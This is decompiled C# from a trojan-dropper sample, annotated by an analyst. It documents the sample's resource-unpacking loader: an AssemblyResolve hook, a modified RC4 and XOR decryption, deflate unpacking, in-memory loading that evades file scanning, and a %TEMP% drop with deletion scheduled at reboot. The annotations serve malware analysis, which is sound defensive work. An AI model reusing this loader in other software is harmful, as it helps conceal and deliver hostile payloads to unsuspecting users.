// Decompiled with JetBrains decompiler
// Type: (left blank in the decompiler output)
// Assembly: ss20, Version=1.1.1.1, Culture=neutral, PublicKeyToken=null
// MVID: 4385E1A7-2FA8-4895-8952-90E8ECDFEF6F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.awrl-32c3dc21d69dcf58806a205f7919ff769fda4c1659e61dc7d2c60838850ea6d5.exe
//
// Analyst notes (comments added during review; the code itself is unchanged decompiler output).
//
// This class is an AssemblyResolve hook that serves dependencies out of the executable's own
// manifest resources. For each unresolved assembly it:
//   1. normalises the requested identity and Base64-encodes it,
//   2. looks the result up in a comma-separated table obtained from \u000F.\u0002(int),
//   3. reads the named manifest resource, optionally XOR-decrypts it (flag 'a') and
//      optionally inflates it (flag 'b'),
//   4. loads it from memory with Assembly.Load(byte[]), or (flag 'c', or when the in-memory
//      load fails) writes it under %TEMP% and loads it with Assembly.LoadFrom.
//
// Reading aids:
//   * Identifiers such as \u0002, \u0003, \u0005 are unprintable names left by the obfuscator;
//     the same name is reused for unrelated methods, fields and nested types.
//   * "if (true) goto label_N; ... label_N: x = tmp; goto label_M;" detours only copy a
//     temporary into a local and jump back. Execution order is the textual order of the
//     statements between the labels.
//   * \u000F and \u0003\u2000 are defined outside this file. \u000F.\u0002(int) is called with
//     integer keys and returns strings; presumably the obfuscator's string-decryption
//     routine. The strings themselves are not visible here.
//   * The decompiler printed Dictionary / IEqualityComparer without type arguments; the cache
//     is used below as a string -> Assembly map.
using System;
using System.Collections.Generic;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;

internal static class \u000E
{
  // Installs the resolver below on the current AppDomain. From then on every assembly the
  // runtime cannot locate by itself is routed through this class.
  internal static void \u0002() => AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u000E.\u0002);

  // AssemblyResolve handler.
  //   _param0: event sender (unused).
  //   _param1: carries the display name of the assembly the runtime failed to resolve.
  // Returns the loaded assembly, or null when the name is not in the embedded table, the
  // resource is missing, or both load attempts failed.
  [MethodImpl(MethodImplOptions.NoInlining)]
  private static Assembly \u0002(object _param0, ResolveEventArgs _param1)
  {
    // Parse the requested display name and re-render it with the version part left out
    // (argument false), so the lookup is version-independent.
    string str1 = new \u000E.\u0002(_param1.Name).\u0002(false);
    if (true)
      goto label_38;
label_1:
    string s1;
    // Lookup key = Base64(UTF-8(normalised identity)).
    string base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(s1));
    if (true)
      goto label_39;
label_2:
    // Embedded lookup table, fetched as one obfuscated string.
    string str2 = \u000F.\u0002(-1181139859);
    if (true)
      goto label_40;
label_3:
    string str3;
    string str4 = str3;
    char[] chArray1 = new char[1];
    if (true)
      goto label_41;
label_4:
    char[] chArray2;
    chArray2[0] = ',';
    char[] chArray3 = chArray2;
    string[] strArray1 = str4.Split(chArray3);
    if (true)
      goto label_42;
label_5:
    if (true)
      goto label_43;
label_6:
    if (true)
      goto label_44;
label_7:
    if (true)
      goto label_45;
label_8:
    string str5 = (string) null; // manifest resource name once a table entry matches
    string s2 = (string) null;   // Base64 of the file name used by the on-disk fallback
    string[] strArray2;
    string str6;
    bool flag1; // 'a': payload is XOR-encrypted
    bool flag2; // 'b': payload is deflate-compressed
    bool flag3; // 'c': load from a file on disk instead of from memory
    // The table is consumed in triples: [key, "<flags>|<resource name>", Base64(file name)].
    for (int index = 0; index < strArray2.Length; index += 3)
    {
      if (strArray2[index].Equals(str6, StringComparison.Ordinal))
      {
        str5 = strArray2[index + 1];
        s2 = strArray2[index + 2];
        // Optional flag prefix before '|'. Without a '|' all three flags stay false.
        int length = str5.IndexOf('|');
        if (length >= 0)
        {
          string str7 = str5.Substring(0, length);
          str5 = str5.Substring(length + 1);
          flag1 = str7.IndexOf('a') != -1;
          flag2 = str7.IndexOf('b') != -1;
          flag3 = str7.IndexOf('c') != -1;
          break;
        }
        break;
      }
    }
    // Not one of the embedded assemblies: let the runtime continue its own resolution.
    if (str5 == null)
      return (Assembly) null;
    Dictionary dictionary = \u000E.\u0003.\u0002;
    Assembly assembly;
    // The cache doubles as the lock object, so each resource is unpacked at most once.
    lock (dictionary)
    {
      if (!dictionary.TryGetValue(str5, out assembly))
      {
        Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str5);
        if (manifestResourceStream == null)
          return (Assembly) null;
        int length1 = (int) manifestResourceStream.Length;
        byte[] numArray = new byte[length1];
        // NOTE(review): a single Read call; the returned byte count is not checked.
        manifestResourceStream.Read(numArray, 0, length1);
        manifestResourceStream.Dispose();
        // Unpacking order is fixed: decrypt first, then decompress.
        if (flag1)
          numArray = \u000E.\u0003(numArray);
        if (flag2)
          numArray = \u000E.\u0002(numArray);
        int length2 = numArray.Length;
        byte[] bytes = Convert.FromBase64String(s2);
        string path2 = Encoding.UTF8.GetString(bytes, 0, bytes.Length);
        if (!flag3)
        {
          try
          {
            // In-memory load: the unpacked image is never written to disk on this path, so
            // file-based scanning only ever sees the packed resource inside the host EXE.
            assembly = Assembly.Load(numArray);
          }
          catch (FileLoadException ex)
          {
            // Fall through to the on-disk path below.
            flag3 = true;
          }
          catch (BadImageFormatException ex)
          {
            flag3 = true;
          }
        }
        if (flag3)
        {
          try
          {
            // On-disk fallback: %TEMP%\<resource name>\<decoded file name>.
            // This directory and file are host artifacts an investigator can look for.
            string str8 = Path.Combine(Path.GetTempPath(), str5);
            Directory.CreateDirectory(str8);
            string str9 = Path.Combine(str8, path2);
            if (!File.Exists(str9))
            {
              Stream stream = (Stream) File.Create(str9);
              stream.Write(numArray, 0, length2);
              stream.Dispose();
              try
              {
                // MoveFileEx with a null destination and flag 4 (MOVEFILE_DELAY_UNTIL_REBOOT)
                // asks Windows to delete the file, then the directory, at the next restart.
                // Windows records such requests in the Session Manager
                // PendingFileRenameOperations registry value. The bool result is ignored.
                \u000E.\u0002(str9, (string) null, 4);
                \u000E.\u0002(str8, (string) null, 4);
              }
              catch
              {
              }
            }
            assembly = Assembly.LoadFrom(str9);
          }
          catch
          {
            // Any failure on this path is swallowed; assembly then keeps its previous value.
          }
        }
        // Cached even when both attempts failed, in which case the stored value is null and
        // later requests for the same resource get null back without a retry.
        dictionary.Add(str5, assembly);
      }
    }
    return assembly;
    // Detour targets of the "if (true) goto" statements above: initialisation only.
label_45:
    flag3 = false;
    goto label_8;
label_44:
    flag2 = false;
    goto label_7;
label_43:
    flag1 = false;
    goto label_6;
label_42:
    strArray2 = strArray1;
    goto label_5;
label_41:
    chArray2 = chArray1;
    goto label_4;
label_40:
    str3 = str2;
    goto label_3;
label_39:
    str6 = base64String;
    goto label_2;
label_38:
    s1 = str1;
    goto label_1;
  }

  // Reads a 32-bit value from _param0 at offset _param1 using a shuffled byte order:
  // byte 0 -> bits 0-7, byte 1 -> bits 24-31, byte 2 -> bits 8-15, byte 3 -> bits 16-23.
  // This is neither little- nor big-endian, so generic header parsers will misread it.
  private static int \u0002(byte[] _param0, int _param1)
  {
    byte[] numArray = _param0;
    if (true)
      ;
    int index = _param1;
    return (int) numArray[index] | (int) _param0[_param1 + 1] << 24 | (int) _param0[_param1 + 2] << 8 | (int) _param0[_param1 + 3] << 16;
  }

  // Inflates a packed blob. Layout as read by this method:
  //   offset 0: magic, must decode to -1686991929 (0x9B728BC7 as unsigned; given the byte
  //             order of the reader above, the blob starts with bytes C7 9B 8B 72)
  //   offset 4: decompressed length
  //   offset 8: raw deflate stream
  // Throws a bare Exception when the magic does not match.
  private static byte[] \u0002(byte[] _param0)
  {
    int num1 = \u000E.\u0002(_param0, 0);
    if (true)
      goto label_6;
label_1:
    int num2;
    if (num2 != -1686991929)
      throw new Exception();
    int num3 = \u000E.\u0002(_param0, 4);
    if (true)
      goto label_7;
label_4:
    MemoryStream memoryStream = new MemoryStream(_param0, false);
    if (true)
      goto label_8;
label_5:
    Stream stream1;
    // Skip the 8-byte header.
    stream1.Position = 8L;
    Stream stream2 = (Stream) new DeflateStream(stream1, CompressionMode.Decompress);
    int count;
    // NOTE(review): the length field is trusted as-is and the output is filled with a single
    // Read call whose result is not checked; neither stream is disposed.
    _param0 = new byte[count];
    stream2.Read(_param0, 0, count);
    return _param0;
label_8:
    stream1 = (Stream) memoryStream;
    goto label_5;
label_7:
    count = num3;
    goto label_4;
label_6:
    num2 = num1;
    goto label_1;
  }

  // XOR-decrypts _param0 in place and returns the same array.
  // The key is a Base64 string from the obfuscated string table, passed through
  // \u0003\u2000.\u0002 (defined elsewhere; its effect on the key bytes is not visible here)
  // and then used to seed the keystream generator \u000E.\u0005.
  [MethodImpl(MethodImplOptions.NoInlining)]
  private static byte[] \u0003(byte[] _param0)
  {
    string str = \u000F.\u0002(-1181139719);
    if (true)
      goto label_11;
label_1:
    string s;
    byte[] numArray1 = Convert.FromBase64String(s);
    if (true)
      goto label_12;
label_2:
    byte[] numArray2;
    \u0003\u2000.\u0002(numArray2);
    \u000E.\u0005 obj1 = new \u000E.\u0005(numArray2);
    if (true)
      goto label_13;
label_3:
    int length = _param0.Length;
    byte num1 = 0;   // position inside the current 32-byte run
    byte num2 = 121; // current keystream byte; overwritten on the first iteration
    // Fixed mask table. Both indexers below are masked with "& 3", so only the first four
    // entries are ever read.
    byte[] numArray3 = new byte[8]
    {
      (byte) 148,
      (byte) 68,
      (byte) 208,
      (byte) 52,
      (byte) 241,
      (byte) 93,
      (byte) 195,
      (byte) 220
    };
    \u000E.\u0005 obj2;
    for (int index = 0; index != length; ++index)
    {
      // A fresh keystream byte is drawn once per 32 payload bytes.
      if (num1 == (byte) 0)
        num2 = obj2.\u0002();
      ++num1;
      if (num1 == (byte) 32)
        num1 = (byte) 0;
      // Each byte is XORed with the keystream byte and two table entries, one selected by
      // (index >> 2) & 3 and one by the run counter & 3.
      _param0[index] ^= (byte) ((uint) num2 ^ (uint) numArray3[index >> 2 & 3] ^ (uint) numArray3[(int) num1 & 3]);
    }
    return _param0;
label_13:
    obj2 = obj1;
    goto label_3;
label_12:
    numArray2 = numArray1;
    goto label_2;
label_11:
    s = str;
    goto label_1;
  }

  // P/Invoke for kernel32!MoveFileEx (source path, destination path, flags). Used above with
  // a null destination and flag 4 to schedule deletion of the dropped file and directory.
  [DllImport("kernel32", EntryPoint = "MoveFileEx")]
  private static extern bool \u0002(string _param0, string _param1, int _param2);

  // Minimal assembly display-name parser and formatter.
  private struct \u0002
  {
    public Version \u0002; // version component
    public string \u0003;  // the component that matches none of the three prefixes (simple name)
    public string \u0005;  // second prefixed component; null when it equals its default text
    public string \u0008;  // third prefixed component; null when it equals its default text

    // Splits _param1 on ',' and classifies each trimmed part by a prefix taken from the
    // obfuscated string table. The prefixes are presumably "Version=", "Culture=" and
    // "PublicKeyToken=", with defaults "neutral" and "null"; confirm by decoding \u000F.
    public \u0002(string _param1)
    {
      Version version = new Version();
      if (true)
        goto label_15;
label_1:
      string empty = string.Empty;
      if (true)
        goto label_16;
label_2:
      if (true)
        goto label_17;
label_3:
      this.\u0008 = (string) null;
      string str1 = _param1;
      char[] chArray = new char[1]{ ',' };
      foreach (string str2 in str1.Split(chArray))
      {
        string str3 = str2.Trim();
        if (str3.StartsWith(\u000F.\u0002(-1181139052), StringComparison.Ordinal))
          this.\u0002 = new Version(str3.Substring(\u000F.\u0002(-1181139052).Length));
        else if (str3.StartsWith(\u000F.\u0002(-1181138971), StringComparison.Ordinal))
        {
          this.\u0005 = str3.Substring(\u000F.\u0002(-1181138971).Length);
          // The default text is stored as null so that formatting can re-insert it.
          if (this.\u0005 == \u000F.\u0002(-1181138954))
            this.\u0005 = (string) null;
        }
        else if (str3.StartsWith(\u000F.\u0002(-1181139000), StringComparison.Ordinal))
        {
          this.\u0008 = str3.Substring(\u000F.\u0002(-1181139000).Length);
          if (this.\u0008 == \u000F.\u0002(-1181138990))
            this.\u0008 = (string) null;
        }
        else
          this.\u0003 = str3;
      }
      return;
      // Detour targets: field defaults assigned before parsing starts.
label_17:
      this.\u0005 = (string) null;
      goto label_3;
label_16:
      this.\u0003 = empty;
      goto label_2;
label_15:
      this.\u0002 = version;
      goto label_1;
    }

    // Re-assembles the display name from the parsed fields. The version segment is emitted
    // only when _param1 is true; null fields are rendered with their default text. The
    // separator strings come from the obfuscated string table.
    public string \u0002(bool _param1)
    {
      StringBuilder stringBuilder1 = new StringBuilder();
      if (true)
        goto label_4;
label_1:
      StringBuilder stringBuilder2;
      stringBuilder2.Append(this.\u0003);
      if (_param1)
        stringBuilder2.Append(\u000F.\u0002(-1181139929)).Append((object) this.\u0002);
      stringBuilder2.Append(\u000F.\u0002(-1181139914)).Append(this.\u0005 ?? \u000F.\u0002(-1181138954)).Append(\u000F.\u0002(-1181139963)).Append(this.\u0008 ?? \u000F.\u0002(-1181138990));
      return stringBuilder2.ToString();
label_4:
      stringBuilder2 = stringBuilder1;
      goto label_1;
    }
  }

  // Holder for the process-wide cache of already unpacked assemblies, keyed by resource name
  // with ordinal string comparison.
  private static class \u0003
  {
    internal static readonly Dictionary \u0002;

    static \u0003()
    {
      Dictionary dictionary = new Dictionary((IEqualityComparer) StringComparer.Ordinal);
      // "if (false) return;" is dead code left by the obfuscator.
      if (false)
        return;
      \u000E.\u0003.\u0002 = dictionary;
    }
  }

  // Keystream generator. Key scheduling and the per-byte step match RC4, with one deviation
  // that matters when re-implementing it for analysis: the j index (\u0005) is NOT reset after
  // key scheduling, so the output differs from a standard RC4 keystream for the same key.
  private sealed class \u0005
  {
    private byte[] \u0002; // 256-byte permutation (S-box)
    private int \u0003;    // index i
    private int \u0005;    // index j

    // Builds the permutation from key _param1: identity fill, then 256 key-dependent swaps.
    public \u0005(byte[] _param1)
    {
      byte[] numArray = new byte[256];
      if (true)
        goto label_9;
label_1:
      // ISSUE: explicit constructor call
      base.\u002Ector();
      int length = _param1.Length;
      if (true)
        goto label_10;
label_2:
      if (true)
        goto label_11;
label_5:
      for (; this.\u0003 < 256; ++this.\u0003)
        this.\u0002[this.\u0003] = (byte) this.\u0003;
      int num;
      // j = (j + key[i % keyLength] + S[i]) & 0xFF; swap(S[i], S[j]).
      // On exit i is 256 and j keeps its last value.
      for (this.\u0003 = this.\u0005 = 0; this.\u0003 < 256; ++this.\u0003)
      {
        this.\u0005 = this.\u0005 + (int) _param1[this.\u0003 % num] + (int) this.\u0002[this.\u0003] & (int) byte.MaxValue;
        this.\u0002(this.\u0003, this.\u0005);
      }
      return;
label_11:
      this.\u0003 = 0;
      goto label_5;
label_10:
      num = length;
      goto label_2;
label_9:
      this.\u0002 = numArray;
      goto label_1;
    }

    // Swaps the permutation entries at positions _param1 and _param2.
    private void \u0002(int _param1, int _param2)
    {
      int num1 = (int) this.\u0002[_param1];
      if (true)
        goto label_2;
label_1:
      this.\u0002[_param1] = this.\u0002[_param2];
      byte num2;
      this.\u0002[_param2] = num2;
      return;
label_2:
      num2 = (byte) num1;
      goto label_1;
    }

    // Produces the next keystream byte:
    // i = (i + 1) & 0xFF; j = (j + S[i]) & 0xFF; swap(S[i], S[j]); return S[(S[i] + S[j]) & 0xFF].
    public byte \u0002()
    {
      int num1 = this.\u0003 + 1 & (int) byte.MaxValue;
      if (true)
        goto label_3;
label_1:
      int num2 = this.\u0005 + (int) this.\u0002[this.\u0003] & (int) byte.MaxValue;
      if (true)
        goto label_4;
label_2:
      this.\u0002(this.\u0003, this.\u0005);
      return this.\u0002[(int) (byte) ((uint) this.\u0002[this.\u0003] + (uint) this.\u0002[this.\u0005])];
label_4:
      this.\u0005 = num2;
      goto label_2;
label_3:
      this.\u0003 = num1;
      goto label_1;
    }
  }
}